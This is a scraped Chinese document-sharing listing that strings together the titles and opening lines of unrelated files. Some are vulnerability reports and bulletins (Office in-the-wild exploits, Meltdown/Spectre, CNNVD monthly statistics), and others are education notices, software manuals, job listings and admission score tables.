目录 0x00 背景介绍 x01 漏洞概述 x02 漏洞攻击面影响 x03 漏洞详情 野外利用的第一个 RTF 版本 野外利用的第二个 PPSX 版本 最新流行的第三个 DOCX 版本 最新发现的 乌

目录 0x00 背景介绍 x01 漏洞概述 x02 漏洞攻击面影响 x03 漏洞详情 野外利用的第一个 RTF 版本 野外利用的第二个 PPSX 版本 最新流行的第三个 DOCX 版本 最新发现的 乌 Office 高级威胁漏洞在野利用分析 安全报告 :Office 高级威胁漏洞在野利用分析 报告编号 :B6-2017-080801 报告来源 :360 安全卫士 报告作者 :360 安全卫士 更新日期 :2017 年 8 月 8 日 目录 0x00 背景介绍... 3 0x01 漏洞概述... 4 0x02 漏洞攻击面影响... 4 0x03 漏洞详情... 6 1. 野外利用的第一个 RTF 版本...

More information

教学〔2016〕120号

教学〔2016〕120号 河 南 省 教 育 厅 教 学 2016 120 号 河 南 省 教 育 厅 关 于 对 口 招 收 中 等 职 业 学 校 毕 业 生 进 入 普 通 高 等 学 校 学 习 的 通 知 各 省 辖 市 省 直 管 县 ( 市 ) 教 育 局, 省 各 级 招 生 机 构, 各 普 通 高 等 学 校 省 属 中 等 职 业 学 校 : 为 贯 彻 党 的 十 八 大 和 十 八 届 三 中 四

More information

Microsoft Word - 正文.doc

Microsoft Word - 正文.doc 3 Access 3.1 SharePoint SharePoint SharePoint 3.6 1 1.15 1 3.1 3.2 1 3.1 40 Access 3.2 2 ID / 3.3 3 3.4 3.5 3.3 / 3.4 3.5 3 41 4 / 6 3.6 3.6 5 1 40 24 3.7 3.7 6 3.8 * 3.8 2 42 Access 1.16 1 3.1 / 1 3.9

More information

AppAssure 5

AppAssure 5 Dell AppAssure 5 用 户 指 南 5.4.2 2014 Dell Inc. 保 留 所 有 权 利 本 指 南 包 含 受 版 权 保 护 的 专 有 信 息 本 指 南 中 所 述 的 软 件 根 据 软 件 许 可 或 保 密 协 议 提 供 只 能 根 据 适 用 协 议 的 条 款 使 用 或 复 制 此 软 件 未 经 Dell Inc. 书 面 许 可, 不 得 以 任

More information

漏洞态势 一 采集漏洞情况 根据国家信息安全漏洞库 (CNNVD) 统计,2018 年 1 月份新增安全漏洞共 1113 个, 从厂商分布来看,Oracle 公司产品的漏洞数量最多, 共发布 174 个 ; 从漏洞类型来看, 跨站脚本类的漏洞占比最大, 达到 15.63% 本月新增漏洞中, 超危漏洞

漏洞态势 一 采集漏洞情况 根据国家信息安全漏洞库 (CNNVD) 统计,2018 年 1 月份新增安全漏洞共 1113 个, 从厂商分布来看,Oracle 公司产品的漏洞数量最多, 共发布 174 个 ; 从漏洞类型来看, 跨站脚本类的漏洞占比最大, 达到 15.63% 本月新增漏洞中, 超危漏洞 信息安全漏洞通报 2018 年 1 月国家信息安全漏洞库 (CNNVD) 漏洞态势 本期导读 根据国家信息安全漏洞库 (CNNVD) 统计,2018 年 1 月份采集安全漏洞共 1113 个,Android 平台成为黑客重要攻击目标 本月接报漏洞共计 1083 信息技术产品漏洞 ( 通用型漏洞 )73 网络信息系统漏洞 ( 事件型漏洞 )1015 个 重大漏洞预警 1 多个 CPU 数据缓存机制漏洞

More information

处理器A级漏洞Meltdown(熔毁)和Spectre(幽灵)分析报告

处理器A级漏洞Meltdown(熔毁)和Spectre(幽灵)分析报告 安天安全研究与应急处理中心 (Antiy CERT) 安天微电子与嵌入式安全研发中心 报告初稿完成时间 :2018 年 1 月 4 日 23 时 首次发布时间 :2018 年 1 月 4 日 23 时 本版更新时间 :2018 年 1 月 5 日 08 时 50 分 1 概述 安天应急处理中心在 2018 年 1 月 4 日, 针对 Google 公司的 Project Zero 等安全团队披露出的英特尔等处理器芯片存在非常严重的安全漏洞,

More information

广东省海外高层次人才需求信息表.xlsx

广东省海外高层次人才需求信息表.xlsx 广 东 省 招 聘 海 外 高 层 次 人 才 需 信 息 表 东 莞 电 子 科 技 大 学 电 子 信 息 工 程 研 究 院 需 高 级 工 程 师 博 士 电 子 研 发 科 技 项 目 管 理 要 工 作 内 容 职 位 要 博 士 不 限 科 技 项 目 管 理 月 薪 人 民 币 0000 元 起 月 薪 人 民 币 000 元 起 东 莞 宝 丽 美 化 工 有 限 公 司 需 博

More information

黑 白 中移 ( 杭州 ) 信息技术有限公司 安全产品部第 10 期 2016/10/14 新型漏洞 MySQL malloc_lib 变量重写命令执行漏洞 漏洞介绍 Oracle MySQL 是美国甲骨文 (Oracle) 公司的一套开源的关系数据库管理系统 MySQL malloc_lib 变量

黑 白 中移 ( 杭州 ) 信息技术有限公司 安全产品部第 10 期 2016/10/14 新型漏洞 MySQL malloc_lib 变量重写命令执行漏洞 漏洞介绍 Oracle MySQL 是美国甲骨文 (Oracle) 公司的一套开源的关系数据库管理系统 MySQL malloc_lib 变量 [ 黑 白 ] 宗旨 : 知黑行白 了解安全资讯, 学习黑客技术 不是为了破坏 而是为了保护 第 10 期 2016/10/14 本期导读 新型漏洞 MySQL malloc_lib 变量重写命令执行漏洞 Apple ios/safari/tvos WebKit 内存破坏漏洞 黑客大白 Struts2 S2-032 远程代码执行漏洞 安全产品部 宣 黑 白 中移 ( 杭州 ) 信息技术有限公司 安全产品部第

More information

ソフトウェア説明書 CA Introscope 9 (9.5)

ソフトウェア説明書 CA Introscope 9 (9.5) CA Introscope Windows Vista Windows 7 Windows Windows XP Red Hat Enterprise Linux 5 Microsoft Windows Server 20 Microsoft Windows Server 20 Microsoft Windows Server 20 Microsoft Windows Server 2008

More information

摘 要 在 這 忙 碌 的 社 會 中, 普 遍 人 們 運 動 時 間 其 實 並 不 充 裕, 體 力 越 來 越 差 的 情 況 下 還 隨 意 飲 食 導 致 身 體 健 康 越 來 越 差, 因 此 本 專 題 打 算 利 用 健 康 飲 食 的 方 式 改 善 這 些 人 的 體 質,

摘 要 在 這 忙 碌 的 社 會 中, 普 遍 人 們 運 動 時 間 其 實 並 不 充 裕, 體 力 越 來 越 差 的 情 況 下 還 隨 意 飲 食 導 致 身 體 健 康 越 來 越 差, 因 此 本 專 題 打 算 利 用 健 康 飲 食 的 方 式 改 善 這 些 人 的 體 質, 元 培 科 技 大 學 資 訊 管 理 系 畢 業 專 題 健 康 飲 食 網 站 計 畫 書 指 導 老 師 : 林 侑 賢 老 師 組 員 : 陳 佑 伊 (971408067) 張 祥 庭 (971408084) 黃 聖 哲 (971408098) 劉 潤 婷 (971408106) 中 華 民 國 一 百 年 十 二 月 摘 要 在 這 忙 碌 的 社 會 中, 普 遍 人 們 運 動 時

More information

Microsoft Word - SPEC-20130418

Microsoft Word - SPEC-20130418 ( 初 稿 2013.04.18) 中 央 研 究 院 經 濟 研 究 所 全 球 資 訊 網 站 改 版 建 置 案 建 議 書 徵 求 說 明 文 件 目 次 壹 專 案 概 述... 2 一 專 案 名 稱... 2 二 專 案 目 標... 2 三 專 案 範 圍... 2 四 專 案 時 程... 2 五 現 況 說 明... 3 貳 專 案 需 求... 3 一 網 站 軟 體 開 發

More information

untitled

untitled SAP SAP Business One ... 4 SAP Business One... 5... 5 SAP Business One... 7 SAP Business One... 8... 8... 8... 9... 10... 11 mysap Business Suite... 12... 13... 14 Copyright 2004 SAP AG. All rights reserved.

More information

UFO-用友电子表软件

UFO-用友电子表软件 Users FriendUFSOFTUFERPU8NCiCRM Windows, Windows NT, SQL Server Microsoft Corporation 1...1 1.1...1 1.2...2 1.3...3 2...4 2.1...4 2.2...4 3...8 3.1...8 3.2...8 3.3...8 4...9 4.1...9 4.2...14 4.3...17 4.4...18

More information

PowerPoint 演示文稿

PowerPoint 演示文稿 The BitCoin Scripting Language 交易实例 交易结构 "result": { "txid": "921a dd24", "hash": "921a dd24", "version": 1, "size": 226, "locktime": 0, "vin": [ ], "vout": [ ], "blockhash": "0000000000000000002c510d

More information

公务员版 B 河北 公务员版 B 河北 公务员版 C 河北 公务员版 C 河北 公务员版 C 河北

公务员版 B 河北 公务员版 B 河北 公务员版 C 河北 公务员版 C 河北 公务员版 C 河北 操作代码 问卷编号 问卷类型 调查地 ( 省 / 直辖市 / 自治区 ) 访问员编号 2013202305 10101 公务员版 A 北京 101 2013202305 10102 公务员版 A 北京 101 2013202305 10103 公务员版 A 北京 101 2013202305 10104 公务员版 B 北京 101 2013202305 10105 公务员版 B 北京 101 2013202305

More information

目 录 第 五 部 分 第 六 部 分 第 七 部 分 第 八 部 分 投 标 邀 请 投 标 人 须 知 附 表 评 标 方 法 和 评 分 细 则 项 目 需 求 和 技 术 方 案 要 求 1

目 录 第 五 部 分 第 六 部 分 第 七 部 分 第 八 部 分 投 标 邀 请 投 标 人 须 知 附 表 评 标 方 法 和 评 分 细 则 项 目 需 求 和 技 术 方 案 要 求 1 政 府 采 购 招 标 文 件 ( 服 务 类 ) 第 二 册 项 目 编 号 :SDGP2016-224 项 目 名 称 : 公 共 法 律 服 务 系 统 开 发 项 目 包 号 :A1 山 东 省 省 级 机 关 政 府 采 购 中 心 目 录 第 五 部 分 第 六 部 分 第 七 部 分 第 八 部 分 投 标 邀 请 投 标 人 须 知 附 表 评 标 方 法 和 评 分 细 则 项 目

More information

致理技術學院資訊管理學系專題企劃書格式建議書

致理技術學院資訊管理學系專題企劃書格式建議書 致 技 術 學 院 資 訊 管 系 專 題 期 末 報 告 致 技 術 學 院 資 訊 管 系 專 題 期 末 報 告 鋼 鐵 業 進 銷 貨 管 系 統 指 導 老 師 : 蕭 勝 華 老 師 鋼 鐵 業 進 銷 貨 管 系 統 蘇 啟 鴻 老 師 學 生 : 張 志 宏 (69810203) 江 智 達 (69810209) 陳 宏 鎧 (69810210) 徐 偉 嘉 (69810211) 彭

More information

<4D6963726F736F667420506F776572506F696E74202D20C8EDBCFEB2E2CAD4D1A7CFB0D7CAC1CF2E707074205BBCE6C8DDC4A3CABD5D>

<4D6963726F736F667420506F776572506F696E74202D20C8EDBCFEB2E2CAD4D1A7CFB0D7CAC1CF2E707074205BBCE6C8DDC4A3CABD5D> 软 件 测 试 学 习 资 料 2014 对 软 件 产 品 ( 不 限 程 序 安 装 包 手 机 应 用 包 游 戏 网 站 等 ) 进 行 的 功 能 性 能 安 全 代 码 级 测 试 检 查, 以 便 发 现 各 种 类 型 的 错 误 找 出 跟 用 户 需 求 体 验 不 一 致 的 问 题 软 件 测 试 的 目 的 : 给 用 户 提 供 一 个 高 质 量 的 软 件 产 品,

More information

产品手册: CA GEN r8

产品手册: CA GEN r8 产 品 手 册 : CA GEN r8 CA Gen r8 CA Gen 是 一 个 成 熟 的 模 拟 驱 动 开 发 环 境, 用 来 设 计 部 署 和 维 护 高 性 能 可 扩 缩 的 企 业 应 用 程 序 集 成 模 型 和 代 码 生 成 使 您 能 够 运 用 平 台 独 立 的 应 用 程 序 来 运 行 您 的 关 键 任 务 进 程 灵 活 的 开 发 方 法 用 来 设 计

More information

营 销 策 划 岗 部 门 招 聘 职 位 招 聘 人 数 岗 位 职 责 基 本 要 求 岗 位 任 职 要 求 6 参 与 项 目 产 品 研 究 客 户 需 求 研 究 竞 争 环 境 研 究 价 格 研 究 等 项 目 市 场 研 究 ; 7 公 司 经 纪 业 务 的 品 牌 管 理, 对

营 销 策 划 岗 部 门 招 聘 职 位 招 聘 人 数 岗 位 职 责 基 本 要 求 岗 位 任 职 要 求 6 参 与 项 目 产 品 研 究 客 户 需 求 研 究 竞 争 环 境 研 究 价 格 研 究 等 项 目 市 场 研 究 ; 7 公 司 经 纪 业 务 的 品 牌 管 理, 对 202 年 国 开 证 券 有 限 责 任 公 司 总 部 招 聘 岗 位 部 门 招 聘 职 位 招 聘 人 数 岗 位 职 责 基 本 要 求 岗 位 任 职 要 求 组 织 策 划 投 资 顾 问 服 务 方 案 及 实 施 ; 中 国 证 券 业 协 会 注 册 证 券 投 资 顾 问 ; 投 顾 管 理 岗 2 组 织 策 划 投 资 顾 问 资 讯 产 品 设 计 方 案 及 实 施 ;

More information

序 软 件 工 程 思 想 林 锐 序 软 件 工 程 思 想 讲 述 软 件 开 发 和 做 程 序 员 的 道 理, 视 野 独 特, 构 思 新 颖, 内 容 风 趣, 不 落 窠 臼, 令 人 耳 目 一 新 堪 称 难 得, 以 至 回 味 无 穷 作 者 从 事 了 八 年 的 软 件 开 发 工 作, 在 他 的 博 士 学 位 论 文 完 成 之 际 写 下 了 这 本 心 之 所 感

More information

帝国CMS下在PHP文件中调用数据库类执行SQL语句实例

帝国CMS下在PHP文件中调用数据库类执行SQL语句实例 帝国 CMS 下在 PHP 文件中调用数据库类执行 SQL 语句实例 这篇文章主要介绍了帝国 CMS 下在 PHP 文件中调用数据库类执行 SQL 语句实例, 本文还详细介绍了帝国 CMS 数据库类中的一些常用方法, 需要的朋友可以参考下 例 1: 连接 MYSQL 数据库例子 (a.php)

More information

<4D6963726F736F667420576F7264202D20C8CBC3F1D3CAB5E7B3F6B0E6C9E732303131C4EAC7EFBCBEBDCCB2C4C4BFC2BCA3A820B8DFD6B0B2BFB7D6A3A9>

<4D6963726F736F667420576F7264202D20C8CBC3F1D3CAB5E7B3F6B0E6C9E732303131C4EAC7EFBCBEBDCCB2C4C4BFC2BCA3A820B8DFD6B0B2BFB7D6A3A9> 二 教 材 目 录 教 学 资 源 栏 符 号 备 注 : 电 子 教 案 源 程 序, 网 络 课 程 授 课 素 材 习 题 答 案 模 拟 试 卷, 实 验 题 目 动 画 录 像 教 学 大 纲 多 媒 体 课 件 ( 一 ) 计 算 机 类 教 材 21 世 纪 高 等 职 业 教 育 信 息 技 术 类 规 划 教 材 计 算 机 软 件 1 978-7-115-23817-7 C# 程

More information

北京师范大学网络信息安全通告 北京师范大学网络信息安全通告 2019 年 6 月报告 北京师范大学信息网络中心 2019 年 7 月

北京师范大学网络信息安全通告 北京师范大学网络信息安全通告 2019 年 6 月报告 北京师范大学信息网络中心 2019 年 7 月 2019 年 6 月报告 北京师范大学信息网络中心 2019 年 7 月 目录漏洞态势... 1 1. 公开漏洞情况... 1 1.1. 漏洞增长概况... 1 1.2. 漏洞分布情况... 2 1.2.1. 漏洞厂商分布... 2 1.2.2. 漏洞产品分布... 2 1.2.3. 漏洞类型分布... 3 1.2.4. 漏洞危害等级分布... 5 1.3. 漏洞修复情况... 5 1.3.1. 整体修复情况...

More information

SDK 概要 使用 Maven 的用户可以从 Maven 库中搜索 "odps-sdk" 获取不同版本的 Java SDK: 包名 odps-sdk-core odps-sdk-commons odps-sdk-udf odps-sdk-mapred odps-sdk-graph 描述 ODPS 基

SDK 概要 使用 Maven 的用户可以从 Maven 库中搜索 odps-sdk 获取不同版本的 Java SDK: 包名 odps-sdk-core odps-sdk-commons odps-sdk-udf odps-sdk-mapred odps-sdk-graph 描述 ODPS 基 开放数据处理服务 ODPS SDK SDK 概要 使用 Maven 的用户可以从 Maven 库中搜索 "odps-sdk" 获取不同版本的 Java SDK: 包名 odps-sdk-core odps-sdk-commons odps-sdk-udf odps-sdk-mapred odps-sdk-graph 描述 ODPS 基础功能的主体接口, 搜索关键词 "odpssdk-core" 一些

More information

epub 61-2

epub 61-2 2 Web Dreamweaver UltraDev Dreamweaver 3 We b We b We Dreamweaver UltraDev We b Dreamweaver UltraDev We b We b 2.1 Web We b We b D r e a m w e a v e r J a v a S c r i p t We b We b 2.1.1 Web We b C C +

More information

一. 漏洞概述 2018 年 3 月 28 日,Cisco IOS 以及 IOS XE 软件被发现存在一个严重漏洞 CVE 攻击者可以在未授权的情况下通过重新加载(reload) 设备造成拒绝服务条件, 或者远程执行代码 Smart Install 是为新的 LAN 以太网交换

一. 漏洞概述 2018 年 3 月 28 日,Cisco IOS 以及 IOS XE 软件被发现存在一个严重漏洞 CVE 攻击者可以在未授权的情况下通过重新加载(reload) 设备造成拒绝服务条件, 或者远程执行代码 Smart Install 是为新的 LAN 以太网交换 绿盟科技安全预警通告 Cisco IOS/IOS XE 远程代码执行漏洞 (CVE-2018-0171) 预警编号 TAG 关注级别 NS-2018-0012 CVE-2018-0171; 远程代码执行 ;Smart Install 红, 攻击者已利用此漏洞进行攻击, 对业务造成较大影响 发布日期 2018-4-8 版本 V1.1 一. 漏洞概述 2018 年 3 月 28 日,Cisco IOS

More information

( )

( ) ( ) 98 1-1-1 ( ) A 3,000 1.00 * 2006 * * 11,232 1-1-2 2006 1-1-3 1 3,000 11,232 3,358.656 839.664 1646.4 740.88 452.76 452.76 2 2006 3 1159 3061 1-1-4 1-1-5 2005 2004 28% 26% 2005 2004 21% 17% 4 2004 80%

More information

支持的趋势科技服务器深度安全防护系统功能(按平台划分)

支持的趋势科技服务器深度安全防护系统功能(按平台划分) 趋势科技服务器深度安全防护系统 9.6 平台支持的功能 趋势科技 ( 中国 ) 有限公司保留对本文档以及此处所述产品进行更改而不通知的权利 在安装及使用本软件之前, 请阅读自述文件 发布说明和最新版本的适用用户文档, 这些文档可以通过趋势科技的以下 Web 站点获得 :http://www.trendmicro.com/download/zh-cn/ Trend Micro Trend Micro

More information

用友零售案例集V4

用友零售案例集V4 烘 焙 食 品 烘 焙 行 业 主 要 生 产 及 经 营 以 小 麦 等 谷 物 粉 料 为 基 本 原 料, 通 过 发 面 高 温 焙 烤 过 程 而 熟 化 的 一 大 类 食 品, 如 面 包 蛋 糕 饼 干 等 随 着 连 锁 经 营 模 式 的 出 现, 越 来 越 多 的 烘 焙 企 业 通 过 引 迚 先 迚 的 经 营 理 念 领 先 的 烘 焙 产 品 设 计 以 及 全 新

More information

北京市招生情况一览表 专业 年份 专业名称 2014 招生计划 最高分 文 2015 最低分 史 平均分 招生计划 最高分 类 文 2016 最低分 史 平均分 招生计划 最高分 类 文 最低分 史 平均分 类 金融学 财政学

北京市招生情况一览表 专业 年份 专业名称 2014 招生计划 最高分 文 2015 最低分 史 平均分 招生计划 最高分 类 文 2016 最低分 史 平均分 招生计划 最高分 类 文 最低分 史 平均分 类 金融学 财政学 北京市招生情况一览表 名称 财政学 国际经济与贸易 市场营销 旅游管理 8 0. 农林经济管理 人力资源管理 化产业管理 法学 0 0 0 法学 经济法方向 0 8 广告学 新闻学 税收学 理 工 理 工 理 0 96 99 管理科学 工程管理 7 信息管理与信息系统 8 8 8 电子商务 7. 工商管理 物流管理 财务管理 7 7 7 金融数学 7 7 7 经济统计学 8 8 8 0 0 0 工

More information

ABOUT ME AGENDA 唐建法 / TJ MongoDB 高级方案架构师 MongoDB 中文社区联合发起人 Spark 介绍 Spark 和 MongoDB 案例演示

ABOUT ME AGENDA 唐建法 / TJ MongoDB 高级方案架构师 MongoDB 中文社区联合发起人 Spark 介绍 Spark 和 MongoDB 案例演示 完整的大数据解決方案 ABOUT ME AGENDA 唐建法 / TJ MongoDB 高级方案架构师 MongoDB 中文社区联合发起人 Spark 介绍 Spark 和 MongoDB 案例演示 Dataframe Pig YARN Spark Stand Alone HDFS Spark Stand Alone Mesos Mesos Spark Streaming Hive Hadoop

More information

西南财经大学金融学院 年各专业高考录取分数线 省份年份专业科类批次最低分 安徽 北京 金融学 理科 本科一批 639 金融学 文科 本科一批 626 金融学 文史 国家专项 620 金融工程 理科 本科一批 629 信用

西南财经大学金融学院 年各专业高考录取分数线 省份年份专业科类批次最低分 安徽 北京 金融学 理科 本科一批 639 金融学 文科 本科一批 626 金融学 文史 国家专项 620 金融工程 理科 本科一批 629 信用 西南财经大学金融学院 - 年各专业高考录取分数线 省份年份专业科类批次最低分 安徽 北京 金融学 理科 本科一批 639 金融学 文科 本科一批 626 金融学 文史 国家专项 620 金融工程 理科 本科一批 629 信用管理 理科 本科一批 634 金融学双语实验班 理科 本科一批 627 金融学双语实验班 文科 本科一批 626 金融学 文科 本科一批 613 金融学 文史 国家专项 601

More information

目 錄 壹 實 務 專 題 製 作 競 賽 ( 複 賽 ) 實 施 計 畫 1 貳 實 務 專 題 製 作 競 賽 ( 複 賽 ) 參 選 作 品 一 覽 表 13 參 評 審 委 員 名 單 23 肆 活 動 照 片 25 伍 實 務 專 題 製 作 競 賽 ( 複 賽 ) 優 良 作 品 名 錄

目 錄 壹 實 務 專 題 製 作 競 賽 ( 複 賽 ) 實 施 計 畫 1 貳 實 務 專 題 製 作 競 賽 ( 複 賽 ) 參 選 作 品 一 覽 表 13 參 評 審 委 員 名 單 23 肆 活 動 照 片 25 伍 實 務 專 題 製 作 競 賽 ( 複 賽 ) 優 良 作 品 名 錄 教 育 部 職 業 學 校 電 機 與 電 子 群 科 中 心 學 校 101 年 度 全 國 高 職 電 機 與 電 子 群 科 專 題 製 作 競 賽 優 良 作 品 集 複 賽 優 勝 作 品 ( 複 賽 優 勝 含 佳 作 共 63 件 ) 指 導 單 位 : 教 育 部 中 部 辦 公 室 執 行 單 位 : 國 立 臺 中 高 級 工 業 職 業 學 校 中 華 民 國 101 年 12

More information

附件三

附件三 行 拉 契 沈 旅 年 錄 行 拉 契 行 行 力 力 不 拉 契 寧 說 參 來 更 來 更 力 力 什 說 拉 契 立 利 來 拉 契 力 年 拉 契 不 不 不 不 識 不 不 理 領 不 更 來 說 裡 靈 來 不 來 路 都 讀 了 更 說 旅 不 度 年 羅 年 讀 都 理 理 羅 讀 了 行 了 路 行 行 旅 行 降 落 北 羅 拉 契 倫 車 來 倫 拉 契 錄 狀 錄 來 來 行

More information

温州市政府分散采购

温州市政府分散采购 温 州 市 政 府 分 散 采 购 招 标 文 件 招 标 编 号 :F - G B 2 0 1 6 0 3 1 4 0 0 4 7 招 标 项 目 : 温 州 市 人 民 政 府 办 公 室 政 务 云 平 台 ( 重 ) 招 标 方 式 : 公 开 招 标 招 标 人 : 温 州 市 人 民 政 府 办 公 室 招 标 代 理 : 二 〇 一 六 年 三 月 目 录 投 标 保 证 金 办 理

More information